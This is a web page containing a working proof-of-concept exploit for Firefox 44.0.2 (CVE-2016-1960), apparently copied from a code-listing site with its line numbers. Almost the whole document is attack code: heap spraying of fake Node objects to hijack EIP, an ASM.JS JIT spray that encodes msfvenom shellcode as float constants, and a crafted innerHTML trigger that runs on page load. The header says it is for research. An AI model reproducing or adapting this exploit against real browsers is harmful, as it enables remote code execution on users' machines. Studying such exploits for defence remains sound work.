1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
|
<!DOCTYPE HTML> <!-- FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375) *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960) ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018 Tested on: Firefox 44.0.2 32-bit - Windows 10 1709 Howto: 1) serve PoC over network and open it in Firefox 44.0.2 32-bit 2) A successfull exploit attempt should pop calc.exe Mozilla Bug Report: Writeup: - For research purposes only - (C) Rh0 Mar. 13, 2018 Notes: *) very similar to CVE-2016-2819, but still different: *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1 because in 46.0.1 it is already fixed. *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it was fixed in Firefox > 46.0.1 --> < title >CVE-2016-1960 and ASM.JS JIT-Spray</ title > < head > < meta charset = UTF -8 /> < script > "use strict" var Exploit = function(){ this.asmjs = new Asmjs() this.heap = new Heap() } Exploit.prototype.go = function(){ /* target address of fake node object */ var node_target_addr = 0x20200000 /* target address of asm.js float pool payload*/ var target_eip = 0x3c3c1dc8 /* spray fake Node objects */ this.heap.spray(node_target_addr, target_eip) /* spray asm.js float constant pools */ this.asmjs.spray_float_payload(0x1800) /* go! */ this.trigger_vuln(node_target_addr) }; Exploit.prototype.trigger_vuln = function(node_ptr){ document.body.innerHTML = '< table >< svg >< div id = "AAAA" >' this.heap.gc() var a = new Array() for (var i=0; i < 0x11000 ; i++){ /* array element (Node object ptr) control with integer underflow */ a[i] = new Uint32Array(0x100/4) for (var j = 0 ; j<0x100/4; j++) a[i][j] = node_ptr } /* original crashing testcase document.getElementById('AAAA').innerHTML = '<title>< template >< td >< tr >< title >< i ></ tr >< style >td</ style >'; */ /* easier to exploit codepath */ document.getElementById('AAAA').innerHTML = '< title >< template >< td >< tr >< title >< i ></ tr >< style >td< DD >'; window.location.reload() }; var Asmjs = function(){}; Asmjs.prototype.asm_js_module = function(stdlib, ffi){ "use asm" var foo = ffi.foo function payload(){ var val = 0.0 /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/ val = +foo( // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py -1.587865768352248e-263, -8.692422460804815e-255, 7.529882109376901e-114, 2.0120602207293977e-16, 3.7204662687249914e-242, 4.351158092040946e+89, 2.284741716118451e+270, 7.620699014501263e-153, 5.996021286047645e+44, -5.981935902612295e-92, 6.23540918304361e+259, 1.9227873281657598e+256, 2.0672493951546363e+187, -6.971032919585734e+91, 5.651413300798281e-134, -1.9040061366251406e+305, -1.2687640718807038e-241, 9.697849844423e-310, -2.0571400761625145e+306, -1.1777948610587587e-123, 2.708909852013898e+289, 3.591750823735296e+37, -1.7960516725035723e+106, 6.326776523166028e+180 ) return +val; } return payload }; Asmjs.prototype.spray_float_payload = function(regions){ this.modules = new Array(regions).fill(null).map( region => this.asm_js_module(window, {foo: () => 0}) ) }; var Heap = function(target_addr, eip){ this.node_heap = [] }; Heap.prototype.spray = function(node_target_addr, target_eip){ var junk = 0x13371337 var current_address = 0x08000000 var block_size = 0x1000000 while(current_address < node_target_addr ){ var fake_objects = new Uint32Array(block_size/4 - 0x100) for (var offset = 0 ; offset < block_size; offset += 0x100000){ /* target Node object needed to control EIP */ fake_objects[offset/4 + 0x00/4] = 0x29 fake_objects[offset/4 + 0x0c/4] = 3 fake_objects[offset/4 + 0x14/4] = node_target_addr + 0x18 fake_objects[offset/4 + 0x18/4] = 1 fake_objects[offset/4 + 0x1c/4] = junk fake_objects[offset/4 + 0x20/4] = node_target_addr + 0x24 fake_objects[offset/4 + 0x24/4] = node_target_addr + 0x28 fake_objects[offset/4 + 0x28/4] = node_target_addr + 0x2c fake_objects[offset/4 + 0x2c/4] = target_eip } this.node_heap.push(fake_objects) current_address += block_size } }; Heap.prototype.gc = function (){ for (var i = 0 ; i<=10; i++) var x = new ArrayBuffer(0x1000000) }; </script> < head > < body onload = 'exploit = new Exploit(); exploit.go()' /> |
评论关闭。